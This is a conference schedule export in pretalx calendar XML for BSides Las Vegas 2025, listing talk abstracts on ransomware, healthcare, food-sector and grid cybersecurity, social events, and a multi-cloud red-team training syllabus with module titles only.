Moreover, U.S. utilities and energy projects remain heavily reliant on non-domestic equipment - for large and distribution power transformers, battery energy storage systems, and communications equipment - introducing potential cybersecurity risks that could destabilize power grids and erode energy resilience. China&#x27;s control over critical mineral processing further compounds U.S. supply chain fragility, threatening to disrupt key industries essential for AI infrastructure. This interconnectedness demonstrates that dominance in AI is not just about computational performance but about securing and optimizing the power that fuels it.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/KQWJAH/</url>
            <location>Copa</location>
            
            <attendee>Emma M Stewart</attendee>
            
            <attendee>Munish Walther-Puri</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>JKHHMR@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-JKHHMR</pentabarf:event-slug>
            <pentabarf:title>Ransomware As Canary For Societal Disruption</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T110000</dtstart>
            <dtend>20250805T113000</dtend>
            <duration>003000</duration>
            <summary>Ransomware As Canary For Societal Disruption</summary>
            <description>Ransomware, like other e-crime actions, is typically viewed as a nuisance and a law enforcement matter from a policy and strategic perspective. However, the economic impact of ransomware (along with other crimes such as business email compromise) is vast, while the disruptive impact - to schools, hospitals, the industrial base, and civil functions - is immense. Compared to actual cyber &quot;attacks&quot; outside of events in Ukraine, ransomware has arguably had a much greater impact on societal function than any &quot;APT&quot; intrusion or incident across the developed world.

To set the stage, we will first review the persistent and long-standing e-crime epidemic and particularly disruptive events such as ransomware that induce loss of availability and functionality. While ransomware carries a significant economic cost in payouts and lost output, there is also a non-trivial social cost in lost functionality related to the operations of schools, hospitals, local governments, and similar entities. When reviewed in detail, especially in the cases of rural hospitals and similar disadvantaged entities, ransomware may serve as a killing function for vital services for marginalized populations.

With this context in mind, we can then review the nature of ransomware operations: often aligning or overlapping with the same tactics, techniques, and procedures employed in supposedly more concerning state-sponsored intrusion operations. Based on this threat actor convergence in behavior, we see an interesting opportunity: that defending against and closing opportunities to criminal actors will improve community defense against a variety of threat actors. For example, the rapid weaponization and exploitation of vulnerabilities in edge devices represents a primary initial access mechanism for both state-sponsored and criminal entities. Developing and implementing planning to more rapidly address these items while advocating for improved development and engineering practices at vendors may thus reduce the impact and likelihood of an incident from multiple threats.

However, defensive measures cannot just be passive in nature. The critical nature of disruptive ransomware to vital societal functions also demands active measures to reduce the scope of adversary activity. This &quot;impose cost&quot; approach is increasingly popular in the current administration, but carries operational and ethical costs depending on how far it is pushed. Yet simply standing by and letting adversaries operate with relative impunity places a significant burden on often poorly-resourced organizations to respond to and mitigate against such threats. Therefore, we will discuss a &quot;reasonably effective and ethically supported&quot; approach to counter-ransomware operations focused on targeting adversary infrastructure, operations, and communication networks for disruption utilizing law enforcement and other authorities.

From this discussion, we will arrive at a conclusion where the ransomware (and broader e-crime) threat is simply no longer sustainable under current mechanisms. By providing for response functions both passive and active in nature, we can &quot;drain the swamp&quot; of ransomware operations to provide greater resilience to critical societal functions across the western world. Furthermore, doing so may not just dramatically alter matters with respect to criminal entities, but have the positive externality of making life significantly harder for state-sponsored hacking teams to breach critical infrastructure entities for more focused and targeted disruption.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/JKHHMR/</url>
            <location>Copa</location>
            
            <attendee>Joe Slowik</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>LNMTZM@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-LNMTZM</pentabarf:event-slug>
            <pentabarf:title>Emergency &amp; Urgent Care Remains in Critical Condition</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T140000</dtstart>
            <dtend>20250805T160000</dtend>
            <duration>020000</duration>
            <summary>Emergency &amp; Urgent Care Remains in Critical Condition</summary>
            <description>Hospitals and trauma centers are increasingly targeted by sophisticated cyber threats that jeopardize patient safety, disrupt critical care, and compromise sensitive health data. In 2025, the healthcare sector remains one of the most attacked industries, with ransomware, phishing, and supply chain disruptions posing daily risks to clinical operations. These threats are especially acute in trauma centers, where even brief system outages can result in life-threatening delays.

This panel will explore the evolving cybersecurity landscape facing healthcare providers, with a focus on high-impact vulnerabilities such as legacy medical devices, unsegmented networks, and third-party software dependencies. Panelists will discuss recent incidents and their cascading effects on emergency care delivery, as well as the broader implications for public health and national security.

The discussion will also highlight emerging policy challenges, including the impact of new federal funding and regulatory frameworks. In addition, the panel will explore operational mitigations such as zero-trust architectures, incident response planning, and workforce training.

Dr. Dameff will provide an informational briefing on an ARPA-H project that he is working on.

In this session, Beau Woods shares his unexpected journey into the world of medical device security—a path that began with curiosity and evolved into a mission to protect lives. As a prominent voice in the &quot;Hackers for Health&quot; movement, Woods will recount how he first encountered vulnerabilities in life-critical systems and the profound ethical questions that followed. Unlike traditional cybersecurity domains, hacking medical equipment involves systems that are directly connected to human bodies—pacemakers, infusion pumps, ventilators, and more—where even minor disruptions can have life-or-death consequences.

Attendees will gain a deeper understanding of the systemic risks facing healthcare infrastructure and leave with actionable insights into how policy, technology, and cross-sector collaboration can strengthen resilience in the face of growing cyber threats.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event2HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/LNMTZM/</url>
            <location>Copa</location>
            
            <attendee>Beau Woods</attendee>
            
            <attendee>Christian Dameff</attendee>
            
            <attendee>Dina Carlisle</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>TLPNPG@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-TLPNPG</pentabarf:event-slug>
            <pentabarf:title>Hackers Kinda Like to Eat</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T170000</dtstart>
            <dtend>20250805T180000</dtend>
            <duration>010000</duration>
            <summary>Hackers Kinda Like to Eat</summary>
            <description>This session will explore the dual challenges facing the food sector: the growing frequency and sophistication of cyberattacks, and the economic concentration that amplifies their impact. With a small number of corporations controlling large portions of meat processing, grain distribution, and food logistics, a single cyber incident can ripple across the entire national food supply. The 2021 ransomware attack on JBS Foods, the world’s largest meat processor, is a stark example of how digital vulnerabilities can threaten food availability, pricing, and public trust.

Panelists will examine the policy landscape, including the role of the Food and Agriculture Sector Coordinating Council, recent CISA advisories, and the implications of proposed cybersecurity mandates for critical infrastructure. The discussion will also address economic incentives and disincentives for cybersecurity investment in a low-margin industry, and the need for public-private collaboration to build resilience.

Attendees will gain a deeper understanding of the systemic risks facing the food industry, the policy levers available to mitigate them, and the urgent need to treat food security as a national cybersecurity priority.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/TLPNPG/</url>
            <location>Copa</location>
            
            <attendee>Curtis Hanson</attendee>
            
            <attendee>Whitney Bowman-Zatzkin</attendee>
            
            <attendee>Andrew Rose</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>NB8XNJ@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-NB8XNJ</pentabarf:event-slug>
            <pentabarf:title>End of Life (EOL) Equipment should not mean End of Life (Your Life)</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T182000</dtstart>
            <dtend>20250805T192000</dtend>
            <duration>010000</duration>
            <summary>End of Life (EOL) Equipment should not mean End of Life (Your Life)</summary>
            <description>This panel will examine the multifaceted challenges of managing EOL technology in high-risk environments. Topics will include the operational and financial barriers to replacing legacy systems, the risks of continued reliance on unsupported software and hardware, and the ethical dilemmas faced by defenders who must secure the unsecurable. Panelists will also explore real-world incidents where forever-day vulnerabilities were exploited, and the cascading consequences that followed.

The discussion will highlight emerging policy proposals aimed at mitigating these risks, including mandatory lifecycle planning, incentives for modernization, liability frameworks for unsupported systems, and the potential role of government-backed vulnerability research and mitigation programs. Attendees will gain insight into how public and private stakeholders can collaborate to reduce systemic exposure, prioritize critical upgrades, and build a more resilient digital ecosystem.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/NB8XNJ/</url>
            <location>Copa</location>
            
            <attendee>Silas Cutler</attendee>
            
            <attendee>Paul Roberts</attendee>
            
            <attendee>Stacey Higginbotham</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>CBW9Y8@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-CBW9Y8</pentabarf:event-slug>
            <pentabarf:title>BSides Pub Quiz</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T210000</dtstart>
            <dtend></dtend>
            <duration>030000</duration>
            <summary>BSides Pub Quiz</summary>
            <description>BSides Pub Quiz</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event2HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/CBW9Y8/</url>
            <location>Copa</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>DZ7B39@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-DZ7B39</pentabarf:event-slug>
            <pentabarf:title>Proving Ground Mentors Meet-Up</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T190000</dtstart>
            <dtend>20250808T200000</dtend>
            <duration>010000</duration>
            <summary>Proving Ground Mentors Meet-Up</summary>
            <description>A meet-up for Proving Ground Mentors, past or present.  Hang out and chill poolside with your fellow BSides heroes.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/DZ7B39/</url>
            <location>Pool</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>HHVRQ9@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-HHVRQ9</pentabarf:event-slug>
            <pentabarf:title>Data Science Meet-Up</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T190000</dtstart>
            <dtend></dtend>
            <duration>010000</duration>
            <summary>Data Science Meet-Up</summary>
            <description>Data Science Meet-Up</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/HHVRQ9/</url>
            <location>Pool</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>GUPQKX@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-GUPQKX</pentabarf:event-slug>
            <pentabarf:title>Speaker Reception</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T200000</dtstart>
            <dtend></dtend>
            <duration>020000</duration>
            <summary>Speaker Reception</summary>
            <description>2025 BSides LV Speaker Reception.  Come meet and hang out with the Program Committee and your fellow presenters at a private poolside function.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event2HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/GUPQKX/</url>
            <location>Pool</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>MYMJAW@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-MYMJAW</pentabarf:event-slug>
            <pentabarf:title>BSides Karaoke</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T220000</dtstart>
            <dtend></dtend>
            <duration>040000</duration>
            <summary>BSides Karaoke</summary>
            <description>Security BSides Karaoke, poolside!</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event4HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/MYMJAW/</url>
            <location>Pool</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>MEABSP@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-MEABSP</pentabarf:event-slug>
            <pentabarf:title>Recovery Hackers, Tuesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T193000</dtstart>
            <dtend>20250805T213000</dtend>
            <duration>020000</duration>
            <summary>Recovery Hackers, Tuesday</summary>
            <description>Not a formal 12-step meeting. Rather, a supportive gathering for folks taking Summer Camp one day at a time. Monday, Tuesday and Wednesday, 19:30-21:30 in G103. Look for the sign on a patio on the pool side of building G and enter through the patio door.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event2HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/MEABSP/</url>
            <location>G-103</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>EUXUJ3@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-EUXUJ3</pentabarf:event-slug>
            <pentabarf:title>Info Booth Opens, Tuesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T070000</dtstart>
            <dtend></dtend>
            <duration>000000</duration>
            <summary>Info Booth Opens, Tuesday</summary>
            <description>Info Booth Opens, Tuesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/EUXUJ3/</url>
            <location>Hallway</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>KALKCA@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-KALKCA</pentabarf:event-slug>
            <pentabarf:title>Registration Opens, Tuesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T080000</dtstart>
            <dtend></dtend>
            <duration>000000</duration>
            <summary>Registration Opens, Tuesday</summary>
            <description>Registration Opens, Tuesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/KALKCA/</url>
            <location>Hallway</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>H9N7UE@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-H9N7UE</pentabarf:event-slug>
            <pentabarf:title>Skytalks Token Drop 3</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T090000</dtstart>
            <dtend>20250805T093000</dtend>
            <duration>003000</duration>
            <summary>Skytalks Token Drop 3</summary>
            <description>Skytalks Token Drop 3
Skytalks token distribution for Tuesday MORNING sessions (10:00-11:30)
Queue in Tuscany Hallway between Middle Ground and Speaker Room.
Tokens are limited in number, and distribution ends when they are gone.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/H9N7UE/</url>
            <location>Hallway</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>3E78YM@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-3E78YM</pentabarf:event-slug>
            <pentabarf:title>Skytalks Token Drop 4</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T123000</dtstart>
            <dtend>20250805T133000</dtend>
            <duration>010000</duration>
            <summary>Skytalks Token Drop 4</summary>
            <description>Skytalks Token Drop 4
Skytalks token distribution for Tuesday AFTERNOON sessions (2:00-4:00 PM)
Queue in Tuscany Hallway between Middle Ground and Speaker Room.
Tokens are limited in number, and distribution ends when they are gone.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/3E78YM/</url>
            <location>Hallway</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>7A79C9@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-7A79C9</pentabarf:event-slug>
            <pentabarf:title>Registration Closes, Tuesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T160000</dtstart>
            <dtend></dtend>
            <duration>000000</duration>
            <summary>Registration Closes, Tuesday</summary>
            <description>Registration Closes, Tuesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/7A79C9/</url>
            <location>Hallway</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>SVTTCL@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-SVTTCL</pentabarf:event-slug>
            <pentabarf:title>Info Booth Closes, Tuesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T160000</dtstart>
            <dtend></dtend>
            <duration>000000</duration>
            <summary>Info Booth Closes, Tuesday</summary>
            <description>Info Booth Closes, Tuesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/SVTTCL/</url>
            <location>Hallway</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>87YVWJ@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-87YVWJ</pentabarf:event-slug>
            <pentabarf:title>Multi-Cloud (AWS, Azure &amp; GCP) Security [25 Edition], Day Two, AM</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T103000</dtstart>
            <dtend>20250805T143000</dtend>
            <duration>040000</duration>
            <summary>Multi-Cloud (AWS, Azure &amp; GCP) Security [25 Edition], Day Two, AM</summary>
            <description>To make the workshop hands-on in the real sense, all trainees will be provided with lab access to the Multi-Cloud Environment. The lab architecture is designed to cover all the attacks, from both aspects, that are demonstrated during the sessions.

### DAY 1 (8 Hrs)
- Part-1 : Introduction about Multi Cloud Environment

  - Module-1 : Azure Cloud Environment
    - Azure Identity : Entra ID &amp; RBAC
    - O365 / Microsoft 365
    - Azure Cloud Services (VM, Storage, IaaS, PaaS, SaaS)

  - Module-2 : AWS Cloud Environment
    - Identity &amp; Access Management
    - AWS Cloud Services (IaaS, PaaS, SaaS)
    - AWS Identity Center

  - Module-3 : GCP Cloud Environment
    - GCP Identity &amp; Access Management
    - GCP Cloud Services (IaaS, PaaS, SaaS)
    - Google Suite / Workspace + Cloud Identity

- Part-2 : Enumeration &amp; Initial Access on Cloud Infrastructure

  - Module-1 : Unauthenticated Enumeration
    - Enumerating Information from DNS Records
    - Enumerating Information from Cloud Vendors
    - Leaked secrets from GitHub
    - Enumerating storage &amp; other information from OSINT

  - Module-2 : Initial Access
    - Exploiting Cloud Services
    - Leaked Credentials
    - Compromising CI/CD pipeline
    - Compromising storage accounts

  - Module-3 : Authenticated Enumeration : IAM, Compute &amp; Storage
    - AWS Services
    - Entra ID &amp; Azure Services
    - Cloud Identity, Google Workspace, GCP Services

### DAY 2 (8 Hrs)
- Part-3 : Exploiting Multi-Cloud Services

  - Module-1 : Exploiting Multi-Cloud Services
    - AWS : cross account, within account
    - Azure : service principal, cross tenant, Entra ID
    - GCP : Access organization, Cloud Identity

  - Module-2 : Privilege Escalation
    - Elevating Privileges on AWS
    - Elevating Privileges on Azure
    - Elevating Privileges on GCP

- Part-4 : Lateral Movement

  - Module-1 : Within Multi-Cloud
    - AWS, GCP, Azure to each other

- Part-5 : Case Study (Multi-Cloud Red Team Simulation)
  - Red Teaming in Simulated Multi-Cloud Lab (Initial Access to Data Exfiltration)

###### NOTE : Attendees do not require cloud accounts; they will get access to the seamless environment &amp; have access to the environment for 15 days with a dedicated Discord channel.

- Why should people attend your course?
  - Practically Understand Enterprise Grade Red Team Operation Methodology in Multi-Cloud Environment
  - Perform Red Team Attack Cycle in Simulated Enterprise Environment
  - Stealth Lateral Movement Techniques in Multi-Cloud, Cloud to on-premise &amp; vice-versa
  - Core Services Mapping / Enumeration / Exploitation
  - Create custom tools to perform manual enumeration

- Student Requirements :

  - Fair Knowledge of Networking and Web Technology
  - Familiarity with CLI
  - An Open mind (*No prior Cloud knowledge is required).

- Who Should Take This Course ?
  - Targeted Audience may include the following group of people:
  - Penetration Testers / Red Teams
  - Cloud Security Professionals
  - Cloud Architects
  - SOC analysts
  - Threat Hunting Team
  - Last but not least, anyone who is interested in strengthening their offensive and detection capabilities in Cloud

- How many years of practical experience would the ideal student have to get most out of this workshop?
  - Minimum 1-3 years in Penetration Testing Domain.

- What Students Should Bring?

  - System with at least 16GB RAM having VMware Workstation Pro installed
  - CWL RedCloud VM With Internet Connectivity

- What Students Will Be Provided With?

  - Soft Copy of the Course Content.
  - Great Knowledge about the Offensive Cloud Techniques used by adversaries.
  - Defense Tactics &amp; Techniques against the discussed offensive techniques.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-16h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/87YVWJ/</url>
            <location>Ballroom</location>
            
            <attendee>Yash Bharadwaj</attendee>
            
            <attendee>Manish Gupta</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>WBBRNJ@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-WBBRNJ</pentabarf:event-slug>
            <pentabarf:title>Multi-Cloud (AWS, Azure &amp; GCP) Security [25 Edition], Day Two, PM</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T150000</dtstart>
            <dtend>20250805T190000</dtend>
            <duration>040000</duration>
            <summary>Multi-Cloud (AWS, Azure &amp; GCP) Security [25 Edition], Day Two, PM</summary>
            <description>To make the workshop hands-on in the real sense, all trainees will be provided with Lab Access to the Multi-Cloud Environment. Lab Architecture is designed to cover all the attacks from both aspects that are demonstrated during the sessions.

### DAY 1 (8 Hrs)
- Part-1 : Introduction about Multi Cloud Environment

  - Module-1 : Azure Cloud Environment
    - Azure Identity : Entra ID &amp; RBAC
    - O365 / Microsoft 365
    - Azure Cloud Services (VM, Storage, IaaS, PaaS, SaaS)

  - Module-2 : AWS Cloud Environment
    - Identity &amp; Access Management
    - AWS Cloud Services (IaaS, PaaS, SaaS)
    - AWS Identity Center

  - Module-3 : GCP Cloud Environment
    - GCP Identity &amp; Access Management
    - GCP Cloud Services (IaaS, PaaS, SaaS)
    - Google Suite / Workspace + Cloud Identity

- Part-2 : Enumeration &amp; Initial Access on Cloud Infrastructure

  - Module-1 : Unauthenticated Enumeration
    - Enumerating Information from DNS Records
    - Enumerating Information from Cloud Vendors
    - Leaked secrets from GitHub
    - Enumerating storage &amp; other information from OSINT

  - Module-2 : Initial Access
    - Exploiting Cloud Services
    - Leaked Credentials
    - Compromising CI/CD pipeline
    - Compromising storage accounts

  - Module-3 : Authenticated Enumeration : IAM, Compute &amp; Storage
    - AWS Services
    - Entra ID &amp; Azure Services
    - Cloud Identity, Google Workspace, GCP Services

### DAY 2 (8 Hrs)
- Part-3 : Exploiting Multi-Cloud Services

  - Module-1 : Exploiting Multi-Cloud Services
    - AWS : cross account, within account
    - Azure : service principal, cross tenant, Entra ID
    - GCP : Access organization, Cloud Identity

  - Module-2 : Privilege Escalation
    - Elevating Privileges on AWS
    - Elevating Privileges on Azure
    - Elevating Privileges on GCP

- Part-4 : Lateral Movement

  - Module-1 : Within Multi-Cloud
    - AWS, GCP, Azure to each other

- Part-5 : Case Study (Multi-Cloud Red Team Simulation)
  - Red Teaming in Simulated Multi-Cloud Lab (Initial Access to Data Exfiltration)

###### NOTE : Attendees do not require cloud accounts; they will get access to the seamless environment for 15 days, along with a dedicated Discord channel.

- Why should people attend your course?
  - Practically Understand Enterprise Grade Red Team Operation Methodology in Multi-Cloud Environment
  - Perform Red Team Attack Cycle in Simulated Enterprise Environment
  - Stealth Lateral Movement Techniques in Multi-Cloud, Cloud to on-premise &amp; vice-versa
  - Core Services Mapping / Enumeration / Exploitation
  - Create custom tools to perform manual enumeration

- Student Requirements :

  - Fair Knowledge of Networking and Web Technology
  - Familiarity with CLI
  - An Open mind (*No prior Cloud knowledge is required).

- Who Should Take This Course ?
  - Targeted Audience may include the following group of people:
  - Penetration Testers / Red Teams
  - Cloud Security Professionals
  - Cloud Architects
  - SOC analysts
  - Threat Hunting Team
  - Last but not least, anyone who is interested in strengthening their offensive and detection capabilities in Cloud

- How many years of practical experience would the ideal student have to get most out of this workshop?
  - Minimum 1-3 years in Penetration Testing Domain.

- What Students Should Bring?

  - System with at least 16GB RAM having VMware Workstation Pro installed
  - CWL RedCloud VM With Internet Connectivity

- What Students Will Be Provided With?

  - Soft Copy of the Course Content.
  - Great Knowledge about the Offensive Cloud Techniques used by adversaries.
  - Defense Tactics &amp; Techniques against the discussed offensive techniques.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-16h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/WBBRNJ/</url>
            <location>Ballroom</location>
            
            <attendee>Yash Bharadwaj</attendee>
            
            <attendee>Manish Gupta</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>EAYEJC@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-EAYEJC</pentabarf:event-slug>
            <pentabarf:title>Engineering Cyber Resilience for the Water Sector</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T103000</dtstart>
            <dtend></dtend>
            <duration>040000</duration>
            <summary>Engineering Cyber Resilience for the Water Sector</summary>
            <description>This training session emerges from the Idaho National Laboratory Cyber-Informed Engineering project, a Department of Energy-supported effort to improve system resilience and risk reduction through design efforts that include cyber risks alongside other hazards considered in engineering. Previous versions of this course have been conducted for local industry groups using different specific engineering problems. This class is a product of those experiences. The diversity of the BSidesLV attendee base will make this class much more engaging than one with an industry-specific audience.

Cyber-Informed Engineering (CIE) offers an opportunity to “engineer out” some cyber risk across the entire system lifecycle, starting from the earliest possible phases of conceptual design and requirements development and system design—the most optimal times to introduce mitigations against cyber risk. CIE is an emerging method to integrate cybersecurity risk considerations into the conception, design, development, and operation of any physical system that has digital connectivity, monitoring, or control. CIE uses design decisions and engineering controls to mitigate or even eliminate avenues for cyber-enabled attacks or reduce the consequences when an attack occurs. In the same way that engineers design systems for safety, engineers informed by CIE use similar methods to prevent or lessen the impact of a cyber-attack. CIE also allows the engineers to advise the approaches used by specialized Information Technology (IT) and Operational Technology (OT) cybersecurity experts to align cybersecurity mitigations to the most critical consequences identified by the engineers. 

What are the 12 principles of CIE?
1. Consequence-Focused Design 
2. Engineered Controls 
3. Secure Information Architecture 
4. Design Simplification 
5. Layered Defenses 
6. Active Defense 
7. Interdependency Evaluation 
8. Digital Asset Awareness 
9. Cyber-Secure Supply Chain Controls 
10. Planned Resilience 
11. Engineering Information Control 
12. Organizational Culture 

The purpose of the training is to help people understand how to use these principles during engineering design to design out many sources of cyber risk. The hands-on workshop engages participants in a journey that helps improve their skills in designing out issues that would later potentially affect cyber risk.

The session begins with a presentation of the principles of Cyber-Informed Engineering, with an initiating question for each principle to prompt thoughts and actions. The scenario used to facilitate discussion is then presented, providing a template against which the principles can be addressed. The exercise then moves through the 12 principles, each given an overview by one of the facilitators. Small-group exercise tasks follow, designed to facilitate the operationalization of each principle. The facilitators help the groups advance their discussion and learning. The training exercise concludes with a lessons-learned discussion.

References:
